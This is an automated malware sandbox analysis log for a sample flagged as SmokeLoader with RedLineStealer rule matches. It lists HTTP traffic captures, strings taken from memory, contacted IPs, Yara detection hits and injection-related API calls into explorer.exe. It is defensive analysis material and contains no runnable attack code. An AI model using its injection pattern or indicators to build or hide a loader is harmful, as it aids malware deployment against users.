72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 65 42 f1 3a 0f e9 ff 09 fc 8c e5 e5 23 98 2b cd fb 2c 5e 10 dd db c0 da 61 d9 2e 19 12 8b 07 99 16 74 52 43 f2 99 67 f4 75 a0 49 4e 1b 77 2c 12 da 20 ec 32 0b a9 86 7c 7d c8 Data Ascii: #\6eB:#+,^a.tRCguINw, 2\|}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: 89ED.exe.1.dr	String found in binary or memory: http://brightdata.com
Source: 89ED.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 89ED.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 89ED.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 89ED.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 89ED.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 89ED.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 89ED.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 89ED.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 89ED.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 89ED.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 89ED.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 89ED.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 89ED.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1771673269.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1769472585.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1768885292.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 89ED.exe, 00000007.00000002.2479804876.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, 89ED.exe.1.dr	String found in binary or memory: http://sourceforge.net/projects/s-zipsfxbuilder/)
Source: explorer.exe, 00000001.00000000.1773173699.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 89ED.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000001.00000000.1773173699.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1773173699.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1765063451.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1770604413.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1770604413.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1773173699.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.4:49843 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 12.3.bbdeaec.5c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C12E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C12E.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bbdeaec.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bbdeaec.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.C12E.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
